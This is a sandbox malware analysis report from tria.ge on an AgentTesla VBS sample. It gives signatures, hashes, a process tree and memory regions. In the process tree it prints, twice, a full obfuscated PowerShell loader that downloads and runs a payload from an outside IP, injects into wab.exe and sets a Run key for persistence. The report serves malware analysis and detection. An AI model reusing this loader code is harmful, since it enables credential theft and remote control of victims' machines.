Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

0dd16a7ff7...e8.vbs

windows7-x64

10

0dd16a7ff7...e8.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    148s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    14/02/2024, 05:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs

  • Size

    36KB

  • MD5

    6fec200ae50301d9e7d4016d8c5bed1c

  • SHA1

    056b1e615dab98aeecdc9adaa477d7b7a3d986d6

  • SHA256

    0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8

  • SHA512

    3985c6e2c3c87a5f79656ebe0557eed8abf9ca1aef8461390e389ad4bc89a2c4c1b329131a3100585eeee10ae6179aaf64e5b0ab8709e69a00fcd785f34e6177

  • SSDEEP

    768:vUJfmkoEm3HXgwCIzBR8qcn7CbwC7cyzul+KaRB0e:cJaE0Q9Izoqce8C7cyzuw/X

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ciphered;function Reaktio ($stik, $Episo, $Takst) {$stik.'Substring'( $Episo, $Takst);}Function Propanes9 ([String]$Pokerishly){For($Rangfors=5; $Rangfors -lt $Pokerishly.Length-$Grnseflade; $Rangfors+=6){$Subte131=Reaktio $Pokerishly $Rangfors $Grnseflade;$Spagn=$Spagn+$Subte131}$Spagn;}$Over = 'tzutil /l';$Monter = (cmd /c $Over);$Monter = [string]$Monter;$RangforsNDICE = $Monter.indexOf('1');$Grnseflade = Reaktio $Monter $RangforsNDICE 1;$Assimilabl220=Propanes9 'LandbhHjesttGaypotBoxbapKvadr:Fjern/Cowbo/Vejsv4Udhal6Armar. Bzer1Pseud8Sotte3Hales.Subli2Embro2Halsu2 Thuj.Predi1Hands9Klapj/saturMunsooa OutvgForelnOvereeSuffl. NaallduksepstudekFravr ';$Spagn01=Propanes9 'InterimegaleCatenxTumme ';$Nippeo = Propanes9 'Capac\Seksus CondySystesPositwStruno TangwAttra6 unde4Flame\ RebuWKursuiSkruenEngrad Slavoyockswbrutts StanPadipooAleipwMicroepluknrflemeSkiganh ToldeIodotlFormalBloms\TrombvUnscr1Topsw.Shaki0Jeble\ Giftp ErotoHenaawLerhoeOsmorrjohansBassehTrilleRemislUnsmilClock.Irrese CootxTungtefldes ';&($Spagn01) (Propanes9 'Chari$ NaboVSigteeShrugsTrindtremonaSpeci2Messk=Heter$KategeRoadwnBrabavtyref:sacbrwArbejienglenTorskdMeseniPapairAlkal ') ;&($Spagn01) (Propanes9 'Ydasu$SkattNIndlei Antep NuntpStapseRebidoExurb=Oilcl$MaddiVReforetranssSelvot RegiaGlorf2Elses+Ridse$DisteNEmissiBoylspPeriopAntibeFiguroDerma ') ;&($Spagn01) (Propanes9 'Insta$BogtrEBeskasSknhepParisaScrumgBehov Lovg=helio Passi(prepr( GlycgAfvaswNonremMetroiBlind oilfw FerniPanesnSnren3 Hait2Seque_OverspCheirrRockroStangc Aaree HoldsAimlesQuadr misop-PaintFEkspe CountPOutqurSljtgo expacDeligeInitisOverss TitaI NykudHeter=Runds$Spine{CuriaPHjemmISpiroDEndte} Mare)Dybde.ChiarCAngiooRelucmWidemm PeniaottetnBackidSportLPolypiTilennDrivgeImpro)Kanar Tupil-HydrosPartipHalvplDrifti DepotDamps Skrdd[ Intrc ReinhbeslaaFilmsrReneg]Decol3Frdse4 fora ');&($Spagn01) (Propanes9 'Berti$DespoRInteretryllg SucciStink Overb= Inex Privc$ LysbESkyttsAccelppediga InocgBelnn[ Slug$AkkliE Svars FordpSpalla AktigUnenv.SammecSalkaoSpirou ForenMusketAmphi-Menta2Centr] Rdbe ');&($Spagn01) (Propanes9 'stoun$VsentFUnpiteSagsks ButttFelthigange=Atlan(PropuTBackseKamersToldstClans-CelluP Prela BesotMonelhUdyde Leah$SammeN DaemidolkhpAerugpKarakeUnikuoAbsol)Islan Overs-DrageAIvithn Lfted Irre Stra(Girli[BispeIAdsprnkienatUdpegP StoltOpporrGaylo]Blind:Rnneb:EgnstsXlskoiCommezBirgieRepub Open-Sensae MineqKommu Stads8Bojar) Skls ') ;if ($Festi) {.$Nippeo $Regi;} else {;$Spagn00=Propanes9 'AflytSRelaptTarmpaHidkar HegntDegen-anskrBTarmeiTammot Frots OverTFlugerPermiaaysesn Sundsblyfrf bagaeBloksrOphth Junk-BordbSStrutoyankeuMolecrSuppocEnentePredi Nepal$ FunkAsenehsAntinsBeggaiModstm JoaniDomspl StrmaTyngdbAnkeslcoiff2Bigam2Media0Bjerg Carli-saurlD YndeeDragosFilret ZaphiFolmanNonfoa expot TrauivarmeoIndflnGulis Knibn$DefinVAfstaeKetchsFalcot ButtaOrigi2Skole ';&($Spagn01) (Propanes9 'Fndri$skampVPersoeNonbesPlanetSpunsaSolce2cambr=Hanga$BevgeeCanton Alsevvikar:KoordaAnodipStrokpExtradmoldaaKimentCardiaWhigg ') ;&($Spagn01) (Propanes9 'OversI ForfmPinscpKntreo Demir arbetResta-BasguMUnforoActindgenanuQuintlEksisepaakl DendrBFarceiVentutBrugss SwanTOutflrLidiaa ForpnUnmassSurrefRedese WillrOffer ') ;$Vesta2=$Vesta2+'\Computeri.San';while (-not $Udletover) {&($Spagn01) (Propanes9 'Rafle$UtricUImpredRumstlNongeeModalt Gramo BindvPatteeHurdlrStart=Indkr(ExterT SatseericssUnsartPrebb-SultaPWaneraSlevltOpteghMaskn Jagir$SportV FebreFastls ObvitNomina Info2 Land)Sigte ') ;&($Spagn01) $Spagn00;&($Spagn01) (Propanes9 'AmmerSMachit SupeaProterGlasstAkryl-cycloSTilsklForhaefibdoeAcrospDegra Gomor5dialo ');}&($Spagn01) (Propanes9 'Alder$LappePFortorLassooSkrumpVelfoaLuketnFatigetaisesKompl Pictu=sunfi TripoGHidhreFjeretCerem-mauthCEndeso VivanTradet MarkeIndern JerntApolo Adstr$TempeV ImpreBearbs MundtAflagaHjfre2Biono ');&($Spagn01) (Propanes9 'Retic$FrakkGGradsaHexacmdeltoaDosshcStere Rott=atten Samm[UninlSToileyNonpos InextMvstieBonehm Slus.FinikCInterokarosn UhelvRevole Unbur OpgatPlast] tilg: Dona:GrundFBuffarHovedoRougemRecipBKaffea Afbas VelyeKryst6Kvali4HaptoSbenzit TilbrChiroipaabenIotacgSkift( forf$UdbetPBarnerTvesyoAndsaptonefaHomilnRedake HoldsDeput)Firef ');&($Spagn01) (Propanes9 'Nonra$BonniS PhotpAktieaPhytogOvermnMedli2Taran Preco=Protr Naest[GableSFructySophisHomestDemageNonflmFirhn. MystTParfaeaadslxStrudtminid.ReallE Recan ConvcCephaoEvoludHavociNonexnAuspig Para] Lall:Guach:ApterABaskeSLedigCafkviIFribaIAfska.SvineGAfkoge posttAmatrSgalopt LintrlaaseiServinTirsdgUneup(Bilko$HulkoGJenfoa NonfmGennea OvercNonro)Archo ');&($Spagn01) (Propanes9 'Maris$LagdeOsulfum KallfSportaLemflvPoseknFodboe Fors= Pisk$LystrS Subap Honoafremsg DyppnNarko2 Frik.TerrasAcrenuHellibAntitsReutit NonprForkoi subpn TohagFinku(Overf3 Bomb2Stibi1Adams8Vngne1Kryds2Svejs, Carg1Cyani9Tacom1Tndrr3Tassi6Skgpe)forgu ');&($Spagn01) $Omfavne;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "tzutil /l"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\system32\tzutil.exe
          tzutil /l
          4⤵
            PID:2672
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$ciphered;function Reaktio ($stik, $Episo, $Takst) {$stik.'Substring'( $Episo, $Takst);}Function Propanes9 ([String]$Pokerishly){For($Rangfors=5; $Rangfors -lt $Pokerishly.Length-$Grnseflade; $Rangfors+=6){$Subte131=Reaktio $Pokerishly $Rangfors $Grnseflade;$Spagn=$Spagn+$Subte131}$Spagn;}$Over = 'tzutil /l';$Monter = (cmd /c $Over);$Monter = [string]$Monter;$RangforsNDICE = $Monter.indexOf('1');$Grnseflade = Reaktio $Monter $RangforsNDICE 1;$Assimilabl220=Propanes9 'LandbhHjesttGaypotBoxbapKvadr:Fjern/Cowbo/Vejsv4Udhal6Armar. Bzer1Pseud8Sotte3Hales.Subli2Embro2Halsu2 Thuj.Predi1Hands9Klapj/saturMunsooa OutvgForelnOvereeSuffl. NaallduksepstudekFravr ';$Spagn01=Propanes9 'InterimegaleCatenxTumme ';$Nippeo = Propanes9 'Capac\Seksus CondySystesPositwStruno TangwAttra6 unde4Flame\ RebuWKursuiSkruenEngrad Slavoyockswbrutts StanPadipooAleipwMicroepluknrflemeSkiganh ToldeIodotlFormalBloms\TrombvUnscr1Topsw.Shaki0Jeble\ Giftp ErotoHenaawLerhoeOsmorrjohansBassehTrilleRemislUnsmilClock.Irrese CootxTungtefldes ';&($Spagn01) (Propanes9 'Chari$ NaboVSigteeShrugsTrindtremonaSpeci2Messk=Heter$KategeRoadwnBrabavtyref:sacbrwArbejienglenTorskdMeseniPapairAlkal ') ;&($Spagn01) (Propanes9 'Ydasu$SkattNIndlei Antep NuntpStapseRebidoExurb=Oilcl$MaddiVReforetranssSelvot RegiaGlorf2Elses+Ridse$DisteNEmissiBoylspPeriopAntibeFiguroDerma ') ;&($Spagn01) (Propanes9 'Insta$BogtrEBeskasSknhepParisaScrumgBehov Lovg=helio Passi(prepr( GlycgAfvaswNonremMetroiBlind oilfw FerniPanesnSnren3 Hait2Seque_OverspCheirrRockroStangc Aaree HoldsAimlesQuadr misop-PaintFEkspe CountPOutqurSljtgo expacDeligeInitisOverss TitaI NykudHeter=Runds$Spine{CuriaPHjemmISpiroDEndte} Mare)Dybde.ChiarCAngiooRelucmWidemm PeniaottetnBackidSportLPolypiTilennDrivgeImpro)Kanar Tupil-HydrosPartipHalvplDrifti DepotDamps Skrdd[ Intrc ReinhbeslaaFilmsrReneg]Decol3Frdse4 fora ');&($Spagn01) (Propanes9 'Berti$DespoRInteretryllg SucciStink Overb= Inex Privc$ LysbESkyttsAccelppediga InocgBelnn[ Slug$AkkliE Svars FordpSpalla AktigUnenv.SammecSalkaoSpirou ForenMusketAmphi-Menta2Centr] Rdbe ');&($Spagn01) (Propanes9 'stoun$VsentFUnpiteSagsks ButttFelthigange=Atlan(PropuTBackseKamersToldstClans-CelluP Prela BesotMonelhUdyde Leah$SammeN DaemidolkhpAerugpKarakeUnikuoAbsol)Islan Overs-DrageAIvithn Lfted Irre Stra(Girli[BispeIAdsprnkienatUdpegP StoltOpporrGaylo]Blind:Rnneb:EgnstsXlskoiCommezBirgieRepub Open-Sensae MineqKommu Stads8Bojar) Skls ') ;if ($Festi) {.$Nippeo $Regi;} else {;$Spagn00=Propanes9 'AflytSRelaptTarmpaHidkar HegntDegen-anskrBTarmeiTammot Frots OverTFlugerPermiaaysesn Sundsblyfrf bagaeBloksrOphth Junk-BordbSStrutoyankeuMolecrSuppocEnentePredi Nepal$ FunkAsenehsAntinsBeggaiModstm JoaniDomspl StrmaTyngdbAnkeslcoiff2Bigam2Media0Bjerg Carli-saurlD YndeeDragosFilret ZaphiFolmanNonfoa expot TrauivarmeoIndflnGulis Knibn$DefinVAfstaeKetchsFalcot ButtaOrigi2Skole ';&($Spagn01) (Propanes9 'Fndri$skampVPersoeNonbesPlanetSpunsaSolce2cambr=Hanga$BevgeeCanton Alsevvikar:KoordaAnodipStrokpExtradmoldaaKimentCardiaWhigg ') ;&($Spagn01) (Propanes9 'OversI ForfmPinscpKntreo Demir arbetResta-BasguMUnforoActindgenanuQuintlEksisepaakl DendrBFarceiVentutBrugss SwanTOutflrLidiaa ForpnUnmassSurrefRedese WillrOffer ') ;$Vesta2=$Vesta2+'\Computeri.San';while (-not $Udletover) {&($Spagn01) (Propanes9 'Rafle$UtricUImpredRumstlNongeeModalt Gramo BindvPatteeHurdlrStart=Indkr(ExterT SatseericssUnsartPrebb-SultaPWaneraSlevltOpteghMaskn Jagir$SportV FebreFastls ObvitNomina Info2 Land)Sigte ') ;&($Spagn01) $Spagn00;&($Spagn01) (Propanes9 'AmmerSMachit SupeaProterGlasstAkryl-cycloSTilsklForhaefibdoeAcrospDegra Gomor5dialo ');}&($Spagn01) (Propanes9 'Alder$LappePFortorLassooSkrumpVelfoaLuketnFatigetaisesKompl Pictu=sunfi TripoGHidhreFjeretCerem-mauthCEndeso VivanTradet MarkeIndern JerntApolo Adstr$TempeV ImpreBearbs MundtAflagaHjfre2Biono ');&($Spagn01) (Propanes9 'Retic$FrakkGGradsaHexacmdeltoaDosshcStere Rott=atten Samm[UninlSToileyNonpos InextMvstieBonehm Slus.FinikCInterokarosn UhelvRevole Unbur OpgatPlast] tilg: Dona:GrundFBuffarHovedoRougemRecipBKaffea Afbas VelyeKryst6Kvali4HaptoSbenzit TilbrChiroipaabenIotacgSkift( forf$UdbetPBarnerTvesyoAndsaptonefaHomilnRedake HoldsDeput)Firef ');&($Spagn01) (Propanes9 'Nonra$BonniS PhotpAktieaPhytogOvermnMedli2Taran Preco=Protr Naest[GableSFructySophisHomestDemageNonflmFirhn. MystTParfaeaadslxStrudtminid.ReallE Recan ConvcCephaoEvoludHavociNonexnAuspig Para] Lall:Guach:ApterABaskeSLedigCafkviIFribaIAfska.SvineGAfkoge posttAmatrSgalopt LintrlaaseiServinTirsdgUneup(Bilko$HulkoGJenfoa NonfmGennea OvercNonro)Archo ');&($Spagn01) (Propanes9 'Maris$LagdeOsulfum KallfSportaLemflvPoseknFodboe Fors= Pisk$LystrS Subap Honoafremsg DyppnNarko2 Frik.TerrasAcrenuHellibAntitsReutit NonprForkoi subpn TohagFinku(Overf3 Bomb2Stibi1Adams8Vngne1Kryds2Svejs, Carg1Cyani9Tacom1Tndrr3Tassi6Skgpe)forgu ');&($Spagn01) $Omfavne;}"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "tzutil /l"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:888
            • C:\Windows\SysWOW64\tzutil.exe
              tzutil /l
              5⤵
                PID:2552
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1908

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX7D35Q36GECXMXHF2JY.temp
        Filesize

        7KB

        MD5

        3843d30f42b278933cbc9ded3e900f81

        SHA1

        fbd609adce1e0eeb7be643dbca254ca6775d5bc0

        SHA256

        77f5e667d82bd4aa57bd5ba1f4b93aa8f942a19d14e2a9e209f1c15cd0e1a62b

        SHA512

        14b05d5fdda5087d1577cef70c02db5caee6767784e63aeeea14d52faceb7a1e7bb9f12fee0ee239bf89f6abc9de1d889c17a26066ed50aaf79c98ae21e42419

        Download Submit

      • memory/1908-41-0x0000000077BA0000-0x0000000077D49000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/1908-58-0x0000000024910000-0x0000000024950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1908-56-0x000000006F720000-0x000000006FE0E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/1908-51-0x0000000024910000-0x0000000024950000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp

        Filesize

        472KB

        Download

      • memory/1908-49-0x000000006F720000-0x000000006FE0E000-memory.dmp

        Filesize

        6.9MB

        Download

      • memory/1908-46-0x0000000077D90000-0x0000000077E66000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/1908-43-0x0000000077D90000-0x0000000077E66000-memory.dmp

        Filesize

        856KB

        Download

      • memory/1908-42-0x0000000077DC6000-0x0000000077DC7000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2812-14-0x0000000073BE0000-0x000000007418B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2812-40-0x0000000077D90000-0x0000000077E66000-memory.dmp

        Filesize

        856KB

        Download

      • memory/2812-47-0x0000000073BE0000-0x000000007418B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2812-13-0x0000000073BE0000-0x000000007418B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2812-15-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2812-16-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2812-31-0x0000000073BE0000-0x000000007418B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2812-32-0x0000000073BE0000-0x000000007418B000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/2812-33-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2812-34-0x00000000050E0000-0x00000000050E1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2812-35-0x0000000006550000-0x000000000B640000-memory.dmp

        Filesize

        80.9MB

        Download

      • memory/2812-36-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2812-39-0x0000000077BA0000-0x0000000077D49000-memory.dmp

        Filesize

        1.7MB

        Download

      • memory/2912-27-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-30-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-29-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-4-0x000000001B370000-0x000000001B652000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2912-28-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-10-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-26-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2912-48-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2912-9-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-7-0x0000000002660000-0x00000000026E0000-memory.dmp

        Filesize

        512KB

        Download

      • memory/2912-8-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2912-6-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2912-5-0x0000000002390000-0x0000000002398000-memory.dmp

        Filesize

        32KB

        Download